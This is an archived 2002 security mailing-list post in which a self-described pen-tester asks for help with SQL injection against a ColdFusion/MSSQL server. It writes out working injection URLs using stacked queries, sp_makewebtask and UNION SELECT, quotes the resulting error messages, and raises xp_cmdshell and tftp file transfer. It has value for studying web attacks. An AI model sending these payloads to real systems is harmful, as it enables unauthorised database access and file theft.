From: Mr Ro (vnmrro@yahoo.com)
Date: Thu Sep 12 2002 - 13:26:39 EDT
hello pen-tester,
I am dealing with a pen-test agains a CFM server with
MSSQL as backend. It is vulnerable with direct SQL
injection.
I figure out that I can create,drop...table, execute
xp_cmdshell, sp_makewebtask, so i submit:
submit:
http://mysite/file.cfm?id=4546;exec sp_makewebtask
"C:\winnt\temp\blah.htm","select * from
master..sysmessages"--
it's okay, and I want to get "C:\winnt\temp\blah.htm".
I submit:
http://mysite/file.cfm?id=4567;create table blah (line
varchar(8000))--
and then, I submit:
http://mysite/file.cfm?id=4567 UNION SELECT line from
mrro--
it returns an error complain that "All queries in an
SQL statement containing a UNION operator must have an
equal number of expressions in their target lists." so
I keep adding "line" in my request url
(http://mysite/file.cfm?id=4567 UNION SELECT
line,line,line from mrro--), finally it returns an
error message like this:
"[Microsoft][ODBC SQL Server Driver][SQL Server]The
text, ntext, or image data type cannot be selected as
DISTINCT."
question here: who can explain me what happened ?
I know there is another way to download or upload
files using "tftp", so is there any free "tftp" server
for me to use instead of installing a new one ?
thank for reading.
best regards
mrro
__________________________________________________
Do you Yahoo!?
Yahoo! News - Today's headlines
http://news.yahoo.com
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:25 EDT